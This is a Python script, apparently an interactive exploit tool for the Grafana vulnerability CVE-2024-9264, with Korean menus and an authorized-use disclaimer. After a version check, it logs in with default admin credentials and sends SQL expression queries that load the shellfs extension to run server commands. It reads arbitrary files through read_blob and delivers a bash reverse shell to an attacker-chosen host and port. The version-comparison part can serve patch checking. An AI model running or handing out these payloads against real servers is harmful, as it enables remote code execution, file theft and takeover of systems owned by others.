#!/usr/bin/env python3
"""Interactive proof-of-concept checker for CVE-2024-9264 (Grafana).

The script talks to a Grafana instance given on the command line and offers
a small menu: read the server version, compare it against the fixed
releases, and run the proof-of-concept requests through the
``/api/ds/query`` expression endpoint.

Use it only against systems you own or are explicitly authorized to test.
Every request is recorded in ``grafana_exploit.log`` in the working
directory.
"""
import logging
import sys
from typing import Any, List, Optional

import requests
from colorama import Fore, init
from packaging.version import InvalidVersion, Version
from psycopg2.extensions import adapt

init(autoreset=True)

# -------------------------
# Prologue (banner)
# -------------------------
print(r"""
 _   __ _____  _____  _____   ___
| | / /|_   _|/  ___||_   _| / _ \
| |/ /   | |  \ `--.   | |  / /_\ \
|    \   | |   `--. \  | |  |  _  |
| |\  \ _| |_ /\__/ / _| |_ | | | |
\_| \_/ \___/ \____/  \___/ \_| |_/

    Edited by : secKrity - 이민준
    CVE ID : CVE-2024-9264
    Affected product : Grafana
    Vulnerable version : prior to 11.0.5+security-01,
                         prior to 11.0.6+security-01,
                         prior to 11.1.6+security-01,
                         prior to 11.1.7+security-01,
                         prior to 11.2.1+security-01,
                         prior to 11.2.2+security-01
""")

# -------------------------
# Logging setup
# -------------------------
logging.basicConfig(
    filename="grafana_exploit.log",
    level=logging.INFO,
    format="%(asctime)s - %(message)s",
)

# Seconds to wait for the version probe and the login request.
REQUEST_TIMEOUT = 5

# Releases that carry the fix for CVE-2024-9264, as listed in the banner.
PATCHED_VERSIONS = (
    "11.0.5+security-01",
    "11.0.6+security-01",
    "11.1.6+security-01",
    "11.1.7+security-01",
    "11.2.1+security-01",
    "11.2.2+security-01",
)

# First release line affected by the CVE.
VULNERABLE_START = "11.0.0"


def log_event(event: str, url: str = "", payload: str = ""):
    """Append one ``EVENT=... URL=... PAYLOAD=...`` record to the log file."""
    logging.info("EVENT=%s URL=%s PAYLOAD=%s", event, url, payload)


# -------------------------
# Utilities: colored output
# -------------------------
def info(msg: str):
    """Print an informational message in yellow with a ``[*]`` prefix."""
    print(Fore.YELLOW + "[*] " + msg)


def success(msg: str):
    """Print a positive result in green with a ``[+]`` prefix."""
    print(Fore.GREEN + "[+] " + msg)


def vuln(msg: str):
    """Print a vulnerability finding in red with a ``[-]`` prefix."""
    print(Fore.RED + "[-] " + msg)


def error(msg: str):
    """Print an error message in red with a ``[!]`` prefix."""
    print(Fore.RED + "[!] " + msg)


def classify_version(ver: str) -> str:
    """Classify a Grafana version string with respect to CVE-2024-9264.

    Returns ``"unaffected"`` for versions older than ``VULNERABLE_START``,
    ``"patched"`` for a fixed release (or anything newer than the fixes of
    its release line), and ``"vulnerable"`` otherwise.

    The comparison is done per ``major.minor`` release line. Comparing
    against the single lowest fixed version would wrongly report e.g.
    11.1.0 as patched merely because it sorts above 11.0.5+security-01.

    Raises:
        InvalidVersion: if ``ver`` cannot be parsed (e.g. ``"Unknown"``).
    """
    current = Version(ver)
    if current < Version(VULNERABLE_START):
        return "unaffected"

    # Group the fixed releases by their (major, minor) release line.
    fixes_by_line = {}
    for raw in PATCHED_VERSIONS:
        fixed = Version(raw)
        fixes_by_line.setdefault(fixed.release[:2], []).append(fixed)

    # Pad so that a short version such as "11" still yields (11, 0).
    line = (current.release + (0, 0))[:2]
    fixes = fixes_by_line.get(line)
    if fixes is None:
        # At or above VULNERABLE_START but on a line with no listed fix:
        # this is a release line newer than every fixed one.
        return "patched"

    # A plain patch release that sorts between two security builds
    # (e.g. 11.0.6 between 11.0.5+security-01 and 11.0.6+security-01) is
    # treated as vulnerable: only the listed builds, or anything newer
    # than the newest of them, count as fixed.
    # NOTE(review): confirm against the vendor advisory.
    if current in fixes or current > max(fixes):
        return "patched"
    return "vulnerable"


# -------------------------
# Grafana Exploit class
# -------------------------
class GrafanaExploit:
    """HTTP client wrapper around one Grafana instance.

    Holds the base URL, the credentials and a ``requests.Session`` so that
    the session cookie obtained by ``login`` is reused by later queries.
    """

    def __init__(self, base_url, user="admin", password="admin"):
        """Store the target URL (without trailing slash) and credentials."""
        self.base_url = base_url.rstrip("/")
        self.session = requests.Session()
        self.user = user
        self.password = password

    def get_version(self) -> str:
        """Return the version reported by the server, or ``"Unknown"``.

        Tries ``/api/health`` first and ``/api/frontend/settings`` second,
        reading either a top-level ``version`` key or ``buildInfo.version``.
        Failures are printed and the next endpoint is tried.
        """
        urls = ["/api/health", "/api/frontend/settings"]
        for path in urls:
            url = self.base_url + path
            try:
                r = self.session.get(url, timeout=REQUEST_TIMEOUT)
                log_event("version_check", url)
                if r.status_code == 200:
                    data = r.json()
                    if "version" in data:
                        return data["version"]
                    if "buildInfo" in data and "version" in data["buildInfo"]:
                        return data["buildInfo"]["version"]
            except Exception as e:
                error(f"버전 확인 실패: {e}")
        return "Unknown"

    def login(self) -> bool:
        """Post the stored credentials to ``/login``.

        Returns ``True`` only when the server answers 200 and the body
        contains ``"Logged in"``. Any exception is printed and treated as
        a failed login.
        """
        url = self.base_url + "/login"
        data = {"user": self.user, "password": self.password}
        try:
            r = self.session.post(url, json=data, timeout=REQUEST_TIMEOUT)
            # Never write the real password to the log file.
            redacted = {**data, "password": "***"}
            log_event("login_attempt", url, str(redacted))
            if r.status_code == 200 and "Logged in" in r.text:
                return True
        except Exception as e:
            error(f"로그인 실패: {e}")
        return False

    def run_query(self, query: str) -> Optional[List[Any]]:
        """Send ``query`` as a SQL expression and return the value columns.

        Returns the ``values`` list of the first frame of result ``B``, or
        ``None`` when the request fails or the response lacks that shape.
        No timeout is set here, so the call blocks until the server
        responds.
        """
        url = self.base_url + "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"
        payload = {
            "from": "1729313027261",
            "to": "1729334627261",
            "queries": [
                {
                    "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
                    "expression": query,
                    "hide": False,
                    "refId": "B",
                    "type": "sql",
                    "window": "",
                }
            ],
        }
        try:
            r = self.session.post(url, json=payload)
            log_event("run_query", url, query)
            return r.json()["results"]["B"]["frames"][0]["data"]["values"]
        except Exception:
            # Best effort: any transport or response-shape error means
            # "no result" to the callers.
            return None

    def check_vuln(self):
        """Run the ``id`` proof-of-concept and return its captured output.

        The command output is redirected to a temporary file on the server
        and read back with ``read_remote_file``. Returns ``None`` when
        nothing could be read.
        """
        tmp_file = "/tmp/grafana_id"
        query = (
            "SELECT 1;"
            "install shellfs from community;"
            "LOAD shellfs;"
            f"SELECT * FROM read_csv('id >{tmp_file} 2>&1 |')"
        )
        self.run_query(query)
        return self.read_remote_file(tmp_file)

    def read_remote_file(self, filepath: str) -> Optional[bytes]:
        """Read ``filepath`` on the server through ``read_blob``.

        Returns the content as bytes, or ``None`` when the query produced
        no result. The path is quoted with psycopg2's ``adapt``.
        """
        escaped_filename = adapt(filepath)
        query = f"SELECT content FROM read_blob({escaped_filename})"
        result = self.run_query(query)
        if result:
            # NOTE(review): assumes the first column holds at least one
            # row; an empty column would raise IndexError here.
            content = result[0][0]
            try:
                # Turn backslash escape sequences in the returned text back
                # into raw bytes.
                decoded = content.encode("utf-8").decode("unicode_escape").encode("latin1")
                return decoded
            except Exception:
                return content.encode()
        return None

    def reverse_shell(self, lhost: str, lport: int):
        """Send the reverse-shell payload for ``lhost:lport``.

        Returns whatever ``read_remote_file`` yields for the temporary
        output file afterwards (possibly ``None``).
        """
        tmp_file = "/tmp/grafana_rs"
        cmd = f"bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\""
        query = (
            "SELECT 1;"
            "install shellfs from community;"
            "LOAD shellfs;"
            f"SELECT * FROM read_csv('{cmd} >{tmp_file} 2>&1 |')"
        )
        self.run_query(query)
        return self.read_remote_file(tmp_file)


# -------------------------
# Menu
# -------------------------
def menu():
    """Print the interactive menu."""
    print("\n[ 메뉴 ]")
    print("1) 버전 탐색")
    print("2) 취약한 버전과 비교")
    print("3) 익스플로잇 (id 실행)")
    print("4) 리버스 셸 획득")
    print("5) 나가기")


def main() -> None:
    """Parse the target URL from ``sys.argv`` and run the menu loop."""
    if len(sys.argv) < 2:
        error(f"Usage: {sys.argv[0]} <grafana_url>")
        sys.exit(1)

    exploit = GrafanaExploit(sys.argv[1])

    while True:
        menu()
        try:
            choice = input(">> ").strip()
        except (EOFError, KeyboardInterrupt):
            # Treat Ctrl-D / Ctrl-C at the prompt like choosing "exit".
            print()
            info("프로그램 종료")
            break

        if choice == "1":
            info("Grafana 버전 확인 중...")
            ver = exploit.get_version()
            print("Grafana Version:", ver)

        elif choice == "2":
            info("취약 버전 리스트와 비교 중...")
            ver = exploit.get_version()
            print("현재 Grafana Version:", ver)
            try:
                verdict = classify_version(ver)
            except InvalidVersion:
                error(f"버전 파싱 실패: {ver}")
                continue
            if verdict == "unaffected":
                success(f"{ver} 은 11.0.0 이전 버전으로, CVE-2024-9264 영향 없음.")
            elif verdict == "patched":
                success(f"{ver} 은 패치된 버전 이상입니다. 취약하지 않을 가능성이 높습니다.")
            else:
                vuln(f"{ver} 은 CVE-2024-9264에 취약합니다. 즉시 업그레이드 필요!")

        elif choice == "3":
            info("로그인 시도...")
            if exploit.login():
                success("로그인 성공")
                info("PoC 실행 (id)...")
                output = exploit.check_vuln()
                if output:
                    vuln("취약점 확인됨 (id 결과):")
                    print(output.decode(errors="ignore"))
                else:
                    success("취약점 동작 안 함")
            else:
                error("로그인 실패")

        elif choice == "4":
            info("리버스 셸 시도...")
            if exploit.login():
                success("로그인 성공")
                lhost = input("공격자 IP (LHOST): ")
                lport = input("공격자 PORT (LPORT): ")
                try:
                    lport = int(lport)
                    info(f"리버스 셸 연결 시도 ({lhost}:{lport})")
                    print(Fore.YELLOW + f"[!] 공격자 측에서 `nc -lvnp {lport}` 실행 중이어야 합니다.")
                    exploit.reverse_shell(lhost, lport)
                    vuln("리버스 셸 페이로드 전송 완료.")
                except Exception as e:
                    error(f"리버스 셸 실행 오류: {e}")
            else:
                error("로그인 실패")

        elif choice == "5":
            info("프로그램 종료")
            break

        else:
            error("잘못된 입력")


if __name__ == "__main__":
    main()